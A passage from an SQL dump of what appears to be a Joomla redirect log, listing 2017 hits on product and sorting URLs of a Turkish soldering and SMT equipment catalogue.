00:00:00',301),(8818,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products',NULL,'','',15,0,'2017-11-05 23:12:08','0000-00-00 00:00:00',301),(8819,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/dalga-lehim',NULL,'','',7,0,'2017-11-05 23:12:12','0000-00-00 00:00:00',301),(8820,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/cs40-detail',NULL,'','',250,0,'2017-11-05 23:12:15','0000-00-00 00:00:00',301),(8821,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/cs40-detail/askquestion?tmpl=component',NULL,'','',248,0,'2017-11-05 23:12:17','0000-00-00 00:00:00',301),(8822,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/le-40v-detail',NULL,'','',250,0,'2017-11-05 23:12:19','0000-00-00 00:00:00',301),(8823,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/ls60v-detail',NULL,'','',250,0,'2017-11-05 23:12:21','0000-00-00 00:00:00',301),(8824,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-fırın',NULL,'','',498,0,'2017-11-05 23:12:23','0000-00-00 00:00:00',301),(8825,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-fırın/by,category_name?language=en-gb',NULL,'','',1,0,'2017-11-05 23:12:27','0000-00-00 00:00:00',301),(8826,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-fırın/by,mf_name?language=en-gb',NULL,'','',1,0,'2017-11-05 23:12:30','0000-00-00 00:00:00',301),(8827,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-fırın/by,product_name?language=en-gb',NULL,'','',1,0,'2017-11-05 23:12:33','0000-00-00 00:00:00',301),(8828,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-fırın/by,product_sku?language=en-gb',NULL,'','',1,0,'2017-11-05 23:12:42','0000-00-00 00:00:00',301),(8829,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-fırın/gf-12-hc-ht-detail',NULL,'','',247,0,'2017-11-05 23:12:45','0000-00-00 00:00:00',301),(8830,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/bölgesel-lehimleme/by,category_name',NULL,'','',498,0,'2017-11-05 23:12:47','0000-00-00 00:00:00',301),(8831,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/bölgesel-lehimleme/by,mf_name?language=en-gb',NULL,'','',246,0,'2017-11-05 23:12:50','0000-00-00 00:00:00',301),(8832,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-düşük-hızlı/dirdesc?language=en-gb',NULL,'','',1,0,'2017-11-05 23:12:52','0000-00-00 00:00:00',301),(8833,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-fırın/by,category_name?language=en-gb',NULL,'','',1,0,'2017-11-05 23:12:54','0000-00-00 00:00:00',301),(8834,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-fırın/by,mf_name?language=en-gb',NULL,'','',1,0,'2017-11-05 23:12:57','0000-00-00 00:00:00',301),(8835,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-fırın/by,product_name?language=en-gb',NULL,'','',1,0,'2017-11-05 23:12:58','0000-00-00 00:00:00',301),(8836,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-fırın/by,product_sku?language=en-gb',NULL,'','',1,0,'2017-11-05 23:13:01','0000-00-00 00:00:00',301),(8837,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-fırın/dirdesc?language=en-gb',NULL,'','',265,0,'2017-11-05 23:13:03','0000-00-00 00:00:00',301),(8838,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-orta-hızlı/by,category_name?language=en-gb',NULL,'','',257,0,'2017-11-05 23:13:05','0000-00-00 00:00:00',301),(8839,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-orta-hızlı/by,mf_name?language=en-gb',NULL,'','',258,0,'2017-11-05 23:13:07','0000-00-00 00:00:00',301),(8840,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-ultra-hız/by,category_name?language=en-gb',NULL,'','',256,0,'2017-11-05 23:13:09','0000-00-00 00:00:00',301),(8841,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-ultra-hız/by,product_name?language=en-gb',NULL,'','',255,0,'2017-11-05 23:13:16','0000-00-00 00:00:00',301),(8842,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-ultra-hız/by,product_sku?language=en-gb',NULL,'','',253,0,'2017-11-05 23:13:18','0000-00-00 00:00:00',301),(8843,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-ultra-hız/dirdesc?language=en-gb',NULL,'','',255,0,'2017-11-05 23:13:24','0000-00-00 00:00:00',301),(8844,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/bölgesel-lehimleme/ess-310-24-detail',NULL,'','',275,0,'2017-11-05 23:13:25','0000-00-00 00:00:00',301),(8845,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/bölgesel-lehimleme/ess-310-24-detail/askquestion?tmpl=component',NULL,'','',271,0,'2017-11-05 23:13:27','0000-00-00 00:00:00',301),(8846,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/ly-8c-detail?tmpl=component&print=1',NULL,'','',25,0,'2017-11-05 23:13:28','0000-00-00 00:00:00',301),(8847,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/bölgesel-lehimleme/ess-310-detail',NULL,'','',272,0,'2017-11-05 23:13:30','0000-00-00 00:00:00',301),(8848,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/bölgesel-lehimleme/ess-310-detail/askquestion?tmpl=component',NULL,'','',270,0,'2017-11-05 23:13:32','0000-00-00 00:00:00',301),(8849,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/bölgesel-lehimleme?language=en-gb',NULL,'','',1,0,'2017-11-05 23:13:35','0000-00-00 00:00:00',301),(8850,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/ã§ubuk-lehim',NULL,'','',276,0,'2017-11-05 23:13:38','0000-00-00 00:00:00',301),(8851,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim',NULL,'','',556,0,'2017-11-05 23:13:40','0000-00-00 00:00:00',301),(8852,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,`p`.product_sku',NULL,'','',544,0,'2017-11-05 23:13:49','0000-00-00 00:00:00',301),(8853,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,`p`.product_sku/dirdesc',NULL,'','',552,0,'2017-11-05 23:13:53','0000-00-00 00:00:00',301),(8854,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,category_name',NULL,'','',536,0,'2017-11-05 23:14:08','0000-00-00 00:00:00',301),(8855,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,category_name/dirdesc',NULL,'','',542,0,'2017-11-05 23:14:10','0000-00-00 00:00:00',301),(8856,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,mf_name',NULL,'','',552,0,'2017-11-05 23:14:22','0000-00-00 00:00:00',301),(8857,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,mf_name/dirdesc',NULL,'','',550,0,'2017-11-05 23:14:24','0000-00-00 00:00:00',301),(8858,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,ordering',NULL,'','',550,0,'2017-11-05 23:14:33','0000-00-00 00:00:00',301),(8859,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,pc.ordering,product_name/dirdesc',NULL,'','',544,0,'2017-11-05 23:14:37','0000-00-00 00:00:00',301),(8860,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,product_name',NULL,'','',547,0,'2017-11-05 23:14:46','0000-00-00 00:00:00',301),(8861,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,product_name/dirdesc',NULL,'','',544,0,'2017-11-05 23:14:49','0000-00-00 00:00:00',301),(8862,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,product_sku',NULL,'','',549,0,'2017-11-05 23:14:59','0000-00-00 00:00:00',301),(8863,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/dirdesc?language=en-gb',NULL,'','',1,0,'2017-11-05 23:15:01','0000-00-00 00:00:00',301),(8864,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/smd-fırın',NULL,'','',551,0,'2017-11-05 23:15:11','0000-00-00 00:00:00',301),(8865,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/smd-fırın/by,`p`.product_sku',NULL,'','',549,0,'2017-11-05 23:15:15','0000-00-00 00:00:00',301),(8866,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/smd-fırın/by,`p`.product_sku/dirdesc',NULL,'','',549,0,'2017-11-05 23:15:18','0000-00-00 00:00:00',301),(8867,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/smd-fırın/by,category_name',NULL,'','',549,0,'2017-11-05 23:15:30','0000-00-00 00:00:00',301),(8868,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/smd-fırın/by,mf_name',NULL,'','',548,0,'2017-11-05 23:15:32','0000-00-00 00:00:00',301),(8869,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/smd-fırın/by,ordering',NULL,'','',556,0,'2017-11-05 23:15:38','0000-00-00 00:00:00',301),(8870,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/smd-fırın/by,pc.ordering,product_name',NULL,'','',556,0,'2017-11-05 23:15:43','0000-00-00 00:00:00',301),(8871,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/smd-fırın/by,product_name',NULL,'','',549,0,'2017-11-05 23:15:48','0000-00-00 00:00:00',301),(8872,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/smd-fırın/by,product_name/dirdesc',NULL,'','',549,0,'2017-11-05 23:15:50','0000-00-00 00:00:00',301),(8873,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/smd-fırın/by,product_sku',NULL,'','',552,0,'2017-11-05 23:15:57','0000-00-00 00:00:00',301),(8874,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/smd-fırın/dirdesc?language=en-gb',NULL,'','',1,0,'2017-11-05 23:16:07','0000-00-00 00:00:00',301),(8875,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-orta-hızlı/by,`p`.product_sku/dirdesc',NULL,'','',564,0,'2017-11-05 23:16:11','0000-00-00 00:00:00',301),(8876,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-orta-hızlı/by,product_name',NULL,'','',552,0,'2017-11-05 23:16:19','0000-00-00 00:00:00',301),(8877,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-orta-hızlı/by,product_sku',NULL,'','',550,0,'2017-11-05 23:16:22','0000-00-00 00:00:00',301),(8878,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-ultra-hız/by,`p`.product_sku?language=en-gb',NULL,'','',1,0,'2017-11-05 23:16:26','0000-00-00 00:00:00',301),(8879,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-ultra-hız/by,category_name',NULL,'','',555,0,'2017-11-05 23:16:32','0000-00-00 00:00:00',301),(8880,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-ultra-hız/by,mf_name',NULL,'','',564,0,'2017-11-05 23:16:39','0000-00-00 00:00:00',301),(8881,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-ultra-hız/by,mf_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-11-05 23:16:42','0000-00-00 00:00:00',301),(8882,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-ultra-hız/by,ordering',NULL,'','',573,0,'2017-11-05 23:16:52','0000-00-00 00:00:00',301),(8883,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-ultra-hız/by,pc.ordering,product_name',NULL,'','',567,0,'2017-11-05 23:16:57','0000-00-00 00:00:00',301),(8884,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-ultra-hız/by,pc.ordering,product_name/dirdesc',NULL,'','',569,0,'2017-11-05 23:17:00','0000-00-00 00:00:00',301),(8885,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-ultra-hız/by,product_name',NULL,'','',564,0,'2017-11-05 23:17:10','0000-00-00 00:00:00',301),(8886,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-ultra-hız/by,product_sku',NULL,'','',562,0,'2017-11-05 23:17:13','0000-00-00 00:00:00',301),(8887,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-ultra-hız/dirdesc',NULL,'','',557,0,'2017-11-05 23:17:19','0000-00-00 00:00:00',301),(8888,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-orta-hızlı/by,`p`.product_sku?language=en-gb',NULL,'','',1,0,'2017-11-05 23:17:24','0000-00-00 00:00:00',301),(8889,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/paste_1_250x250.jpg',NULL,'','',2,0,'2017-11-05 23:17:25','0000-00-00 00:00:00',301),(8890,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-orta-hızlı/by,category_name/dirdesc',NULL,'','',580,0,'2017-11-05 23:17:26','0000-00-00 00:00:00',301),(8891,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-ultra-hız/by,category_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-11-05 23:17:31','0000-00-00 00:00:00',301),(8892,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-ultra-hız/dirdesc',NULL,'','',559,0,'2017-11-05 23:18:00','0000-00-00 00:00:00',301),(8893,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-ultra-hız?language=en-gb',NULL,'','',1,0,'2017-11-05 23:18:03','0000-00-00 00:00:00',301),(8894,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-fırın',NULL,'','',561,0,'2017-11-05 23:18:07','0000-00-00 00:00:00',301),(8895,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-fırın/by,`p`.product_sku',NULL,'','',558,0,'2017-11-05 23:18:09','0000-00-00 00:00:00',301),(8896,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-fırın/by,mf_name',NULL,'','',556,0,'2017-11-05 23:18:22','0000-00-00 00:00:00',301),(8897,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-fırın/by,mf_name/dirdesc',NULL,'','',561,0,'2017-11-05 23:18:24','0000-00-00 00:00:00',301),(8898,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-fırın/by,product_name/dirdesc',NULL,'','',558,0,'2017-11-05 23:18:30','0000-00-00 00:00:00',301),(8899,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-fırın/dirdesc',NULL,'','',559,0,'2017-11-05 23:18:33','0000-00-00 00:00:00',301),(8900,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-orta-hızlı',NULL,'','',559,0,'2017-11-05 23:18:38','0000-00-00 00:00:00',301),(8901,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-orta-hızlı/by,`p`.product_sku/dirdesc',NULL,'','',556,0,'2017-11-05 23:18:40','0000-00-00 00:00:00',301),(8902,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-orta-hızlı/by,category_name',NULL,'','',560,0,'2017-11-05 23:18:45','0000-00-00 00:00:00',301),(8903,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-orta-hızlı/by,category_name/dirdesc',NULL,'','',557,0,'2017-11-05 23:18:47','0000-00-00 00:00:00',301),(8904,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-orta-hızlı/by,mf_name/dirdesc',NULL,'','',558,0,'2017-11-05 23:18:55','0000-00-00 00:00:00',301),(8905,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-ultra-hız',NULL,'','',565,0,'2017-11-05 23:18:57','0000-00-00 00:00:00',301),(8906,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-ultra-hız/by,category_name',NULL,'','',565,0,'2017-11-05 23:19:29','0000-00-00 00:00:00',301),(8907,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-ultra-hız/by,category_name/dirdesc',NULL,'','',559,0,'2017-11-05 23:19:31','0000-00-00 00:00:00',301),(8908,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-ultra-hız/dirdesc',NULL,'','',564,0,'2017-11-05 23:19:37','0000-00-00 00:00:00',301),(8909,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/smd-fırın',NULL,'','',560,0,'2017-11-05 23:19:44','0000-00-00 00:00:00',301),(8910,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/smd-fırın/by,`p`.product_sku',NULL,'','',557,0,'2017-11-05 23:19:47','0000-00-00 00:00:00',301),(8911,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/smd-fırın/by,`p`.product_sku/dirdesc',NULL,'','',559,0,'2017-11-05 23:19:49','0000-00-00 00:00:00',301),(8912,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/smd-fırın/by,category_name',NULL,'','',557,0,'2017-11-05 23:20:01','0000-00-00 00:00:00',301),(8913,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/smd-fırın/by,category_name/dirdesc',NULL,'','',556,0,'2017-11-05 23:20:06','0000-00-00 00:00:00',301),(8914,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/smd-fırın/by,mf_name',NULL,'','',554,0,'2017-11-05 23:20:21','0000-00-00 00:00:00',301),(8915,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/smd-fırın/by,mf_name/dirdesc',NULL,'','',554,0,'2017-11-05 23:20:24','0000-00-00 00:00:00',301),(8916,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/smd-fırın/by,ordering',NULL,'','',554,0,'2017-11-05 23:20:45','0000-00-00 00:00:00',301),(8917,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/smd-fırın/by,pc.ordering,product_name',NULL,'','',557,0,'2017-11-05 23:20:52','0000-00-00 00:00:00',301),(8918,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/smd-fırın/by,pc.ordering,product_name/dirdesc',NULL,'','',558,0,'2017-11-05 23:20:55','0000-00-00 00:00:00',301),(8919,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/smd-fırın/by,product_name/dirdesc',NULL,'','',570,0,'2017-11-05 23:21:06','0000-00-00 00:00:00',301),(8920,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/smd-fırın/dirdesc',NULL,'','',575,0,'2017-11-05 23:21:09','0000-00-00 00:00:00',301),(8921,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı',NULL,'','',577,0,'2017-11-05 23:21:12','0000-00-00 00:00:00',301),(8922,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,category_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-11-05 23:21:14','0000-00-00 00:00:00',301),(8923,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,pc.ordering,product_name',NULL,'','',563,0,'2017-11-05 23:21:16','0000-00-00 00:00:00',301),(8924,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,pc.ordering,product_name/dirdesc',NULL,'','',566,0,'2017-11-05 23:21:18','0000-00-00 00:00:00',301),(8925,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,product_name',NULL,'','',558,0,'2017-11-05 23:21:27','0000-00-00 00:00:00',301),(8926,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,product_name/dirdesc',NULL,'','',556,0,'2017-11-05 23:21:29','0000-00-00 00:00:00',301),(8927,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,product_sku',NULL,'','',564,0,'2017-11-05 23:21:33','0000-00-00 00:00:00',301),(8928,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/dirdesc',NULL,'','',561,0,'2017-11-05 23:21:35','0000-00-00 00:00:00',301),(8929,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/le-40v-detail/askquestion?tmpl=component',NULL,'','',280,0,'2017-11-05 23:21:48','0000-00-00 00:00:00',301),(8930,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/ls60v-detail/askquestion?tmpl=component',NULL,'','',277,0,'2017-11-05 23:21:51','0000-00-00 00:00:00',301),(8931,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-fırın',NULL,'','',569,0,'2017-11-05 23:21:54','0000-00-00 00:00:00',301),(8932,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-fırın/by,`p`.product_sku',NULL,'','',563,0,'2017-11-05 23:21:56','0000-00-00 00:00:00',301),(8933,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-fırın/by,`p`.product_sku/dirdesc',NULL,'','',564,0,'2017-11-05 23:21:59','0000-00-00 00:00:00',301),(8934,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-fırın/by,category_name/dirdesc',NULL,'','',572,0,'2017-11-05 23:22:08','0000-00-00 00:00:00',301),(8935,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-fırın/by,category_name?language=en-gb',NULL,'','',1,0,'2017-11-05 23:22:12','0000-00-00 00:00:00',301),(8936,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-fırın/by,mf_name/dirdesc',NULL,'','',565,0,'2017-11-05 23:22:14','0000-00-00 00:00:00',301),(8937,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-fırın/by,mf_name?language=en-gb',NULL,'','',1,0,'2017-11-05 23:22:20','0000-00-00 00:00:00',301),(8938,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-fırın/by,ordering?language=en-gb',NULL,'','',1,0,'2017-11-05 23:22:23','0000-00-00 00:00:00',301),(8939,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-fırın/by,pc.ordering,product_name',NULL,'','',561,0,'2017-11-05 23:22:25','0000-00-00 00:00:00',301),(8940,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-fırın/by,pc.ordering,product_name/dirdesc',NULL,'','',563,0,'2017-11-05 23:22:27','0000-00-00 00:00:00',301),(8941,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-fırın/by,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-11-05 23:22:42','0000-00-00 00:00:00',301),(8942,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-fırın/by,product_name?language=en-gb',NULL,'','',1,0,'2017-11-05 23:22:45','0000-00-00 00:00:00',301),(8943,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-fırın/by,product_sku?language=en-gb',NULL,'','',1,0,'2017-11-05 23:22:50','0000-00-00 00:00:00',301),(8944,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-fırın/gf-12-hc-ht-detail',NULL,'','',276,0,'2017-11-05 23:22:52','0000-00-00 00:00:00',301),(8945,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-fırın/ly-8c-detail',NULL,'','',279,0,'2017-11-05 23:22:56','0000-00-00 00:00:00',301),(8946,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-fırın/ly-8c-detail/askquestion?tmpl=component',NULL,'','',276,0,'2017-11-05 23:23:11','0000-00-00 00:00:00',301),(8947,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-orta-hızlı',NULL,'','',562,0,'2017-11-05 23:23:14','0000-00-00 00:00:00',301),(8948,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-orta-hızlı/am100-detail/askquestion?tmpl=component',NULL,'','',279,0,'2017-11-05 23:23:16','0000-00-00 00:00:00',301),(8949,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-orta-hızlı/by,category_name',NULL,'','',542,0,'2017-11-05 23:23:19','0000-00-00 00:00:00',301),(8950,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-orta-hızlı/by,mf_name',NULL,'','',552,0,'2017-11-05 23:23:41','0000-00-00 00:00:00',301),(8951,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-orta-hızlı/by,ordering?language=en-gb',NULL,'','',1,0,'2017-11-05 23:24:00','0000-00-00 00:00:00',301),(8952,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-orta-hızlı/by,pc.ordering,product_name',NULL,'','',556,0,'2017-11-05 23:24:04','0000-00-00 00:00:00',301),(8953,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-orta-hızlı/by,product_name/dirdesc',NULL,'','',545,0,'2017-11-05 23:24:11','0000-00-00 00:00:00',301),(8954,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-orta-hızlı/dirdesc?language=en-gb',NULL,'','',1,0,'2017-11-05 23:24:13','0000-00-00 00:00:00',301),(8955,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-orta-hızlı/mx200lp-detail/askquestion?tmpl=component',NULL,'','',270,0,'2017-11-05 23:24:33','0000-00-00 00:00:00',301),(8956,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-ultra-hız',NULL,'','',560,0,'2017-11-05 23:24:39','0000-00-00 00:00:00',301),(8957,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-ultra-hız/by,`p`.product_sku',NULL,'','',541,0,'2017-11-05 23:24:53','0000-00-00 00:00:00',301),(8958,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-ultra-hız/by,category_name/dirdesc',NULL,'','',545,0,'2017-11-05 23:24:58','0000-00-00 00:00:00',301),(8959,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-ultra-hız/by,mf_name/dirdesc',NULL,'','',545,0,'2017-11-05 23:25:03','0000-00-00 00:00:00',301),(8960,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-ultra-hız/by,pc.ordering,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-11-05 23:25:26','0000-00-00 00:00:00',301),(8961,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-ultra-hız/by,product_name',NULL,'','',553,0,'2017-11-05 23:25:28','0000-00-00 00:00:00',301),(8962,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-ultra-hız/by,product_name/dirdesc',NULL,'','',548,0,'2017-11-05 23:25:30','0000-00-00 00:00:00',301),(8963,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-ultra-hız/by,product_sku',NULL,'','',547,0,'2017-11-05 23:25:37','0000-00-00 00:00:00',301),(8964,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-ultra-hız/cm-602-l-detail/askquestion?tmpl=component',NULL,'','',270,0,'2017-11-05 23:25:42','0000-00-00 